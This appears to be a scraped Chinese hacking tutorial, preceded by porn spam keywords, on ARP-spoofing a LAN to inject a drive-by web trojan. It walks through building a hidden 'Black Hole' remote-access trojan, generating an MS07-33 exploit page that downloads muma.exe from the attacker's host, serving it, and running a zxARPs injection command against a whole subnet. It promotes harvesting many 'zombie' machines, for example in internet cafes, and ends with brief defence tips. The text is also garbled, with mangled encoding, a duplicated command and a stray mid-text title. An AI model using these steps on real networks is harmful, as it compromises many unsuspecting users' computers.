欧美另类日韩中文色综合,天堂va亚洲va欧美va国产,www.av在线播放,大香视频伊人精品75,奇米777888,欧美日本道免费二区三区,中文字幕亚洲综久久2021

新的掛馬方式ARP欺騙掛馬稱雄局域網(wǎng) -電腦資料

電腦資料 時(shí)間:2019-01-01 我要投稿
【www.lotusphilosophies.com - 電腦資料】

    信息來(lái)源:邪惡八進(jìn)制信息安全團(tuán)隊(duì)(www.eviloctal.com)

    網(wǎng)頁(yè)掛馬最難的就是傳播了,小網(wǎng)站易入侵但是訪問(wèn)人數(shù)不多,收獲的肉雞也就不是很多,

新的掛馬方式ARP欺騙掛馬稱雄局域網(wǎng)

。因此,一種新的掛馬方式開始流行——局域網(wǎng)ARP欺騙掛馬,只要局域網(wǎng)內(nèi)一臺(tái)機(jī)子中招了,它就可以在內(nèi)網(wǎng)傳播含有木馬的網(wǎng)頁(yè),捕獲的肉雞就會(huì)成幾何增長(zhǎng)。

    局域網(wǎng)ARP欺騙掛馬的好處如下:無(wú)需入侵網(wǎng)站,只要你的主機(jī)處于局域網(wǎng)中即可,這是它最大的優(yōu)點(diǎn);收獲的肉雞多多,短時(shí)間內(nèi)可以收獲數(shù)十臺(tái)甚至上百臺(tái)肉雞,類似網(wǎng)吧這樣由上百臺(tái)電腦組成的局域網(wǎng)是最好的掛馬場(chǎng)所;局域網(wǎng)內(nèi)的用戶訪問(wèn)任何網(wǎng)站都會(huì)中我們的木馬?戳松厦娴慕榻B,各位是不是已經(jīng)蠢蠢欲動(dòng)了?

    第一步:配置木馬服務(wù)端

    我們以“黑洞”木馬為例。運(yùn)行“黑洞”木馬的Client.exe文件,進(jìn)入Client.exe的主界面后,點(diǎn)擊“文件→創(chuàng)建DLL插入版本服務(wù)端程序”。

    進(jìn)入服務(wù)端程序的創(chuàng)建界面后,首先勾選“Win NT/2000/XP/2003下隱藏服務(wù)端文件、注冊(cè)表、進(jìn)程和服務(wù)”,然后切換到“連接選項(xiàng)”標(biāo)簽,在“主機(jī)”一欄中填入本機(jī)的公網(wǎng)IP地址,端口可以保持默認(rèn)的“2007”。最后在“連接密碼”處填入用來(lái)連接對(duì)方的密碼,例如123456。設(shè)置完成后點(diǎn)擊“生成”按鈕,將木馬服務(wù)端保存為muma.exe。

    填寫密碼

    第二步:生成網(wǎng)頁(yè)木馬

    既然是掛馬,那當(dāng)然缺不了網(wǎng)頁(yè)木馬了。這里我們用“MS07-33網(wǎng)馬生成器”為例。運(yùn)行“MS07-33網(wǎng)馬生成器”,在“網(wǎng)馬地址”文本框中輸入木馬所在路徑,由于等會(huì)我們要自行架設(shè)Http服務(wù),所以這里應(yīng)該填入“http://192.168.0.2/muma.exe“,其中192.168.0.2是本機(jī)在局域網(wǎng)中的IP地址。點(diǎn)擊“生成網(wǎng)馬”按鈕即可生成網(wǎng)馬hackll.htm。

    第三步:開啟本機(jī)Http服務(wù)

    要讓局域網(wǎng)中的其他主機(jī)能夠訪問(wèn)到我們的網(wǎng)馬,就要開啟本機(jī)的Http服務(wù),

電腦資料

新的掛馬方式ARP欺騙掛馬稱雄局域網(wǎng)》(http://www.lotusphilosophies.com)。下載baby web server,這是一款簡(jiǎn)單的Web服務(wù)器軟件,下載后直接運(yùn)行,在其主界面中點(diǎn)擊“服務(wù)→設(shè)置”。

    將“網(wǎng)頁(yè)目錄”設(shè)置為網(wǎng)頁(yè)木馬所在的地方,例如C盤根目錄“C:\“。點(diǎn)“確定”回主界面,然后再點(diǎn)“Start”按鈕開啟本機(jī)的Http服務(wù)。記得要將木馬服務(wù)端和網(wǎng)頁(yè)木馬放到C盤根目錄。

    按鈕開啟本機(jī)的Http服務(wù)

    第四步:局域網(wǎng)掛馬

    最后該請(qǐng)我們的主角出場(chǎng)了,就是上文中提到的小工具,這個(gè)工具叫zxARPs,是一個(gè)通過(guò)ARP欺騙實(shí)現(xiàn)局域網(wǎng)掛馬的工具。在使用zxARPs前我們要安裝WinPcap,它是網(wǎng)絡(luò)底層驅(qū)動(dòng)包,沒有它zxARPs就運(yùn)行不了。

    安裝好后將zxARPs放到任意目錄,然后運(yùn)行“命令提示符”,進(jìn)入zxARPs所在的目錄,然后輸入命令:zxARPs.exe -idx 0 -ip 192.168.0.1-192.168.0.255 -port 80 -insert "

    安裝好后將zxARPs放到任意目錄,然后運(yùn)行“命令提示符”,進(jìn)入zxARPs所在的目錄,然后輸入命令:zxARPs.exe -idx 0 -ip 192.168.0.1-192.168.0.255 -port 80 -insert "";剀嚭髵祚R就成功了。

    從現(xiàn)在開始,局域網(wǎng)中的用戶無(wú)論訪問(wèn)什么網(wǎng)站,都會(huì)運(yùn)行我們的網(wǎng)頁(yè)木馬,因?yàn)閦xARPs在用戶打開網(wǎng)頁(yè)的同時(shí)已經(jīng)將掛馬代碼插入到正常網(wǎng)頁(yè)中

    ARP掛馬防范技巧

    從上文可見zxARPs的功能真的十分強(qiáng)大,但它畢竟是基于ARP欺騙原理的,只要局域網(wǎng)內(nèi)的主機(jī)能夠抵御ARP欺騙攻擊,就可以完全無(wú)視zxARPs的掛馬方法。

    網(wǎng)管將局域網(wǎng)內(nèi)所有的主機(jī)的IP地址和MAC地址進(jìn)行綁定即可搞定。我們也可以下載“360ARP防火墻”來(lái)抵御ARP欺騙攻擊(下載地址http://www2.cpcw.com/bzsoft),安裝完成后點(diǎn)擊界面上的“開啟”按鈕就可以讓它保護(hù)我們免受ARP欺騙的攻擊了。這時(shí)如果有人對(duì)你的主機(jī)進(jìn)行ARP欺騙攻擊,我們?cè)诳梢渣c(diǎn)擊“記錄”按鈕,查看攻擊者的IP地址。

最新文章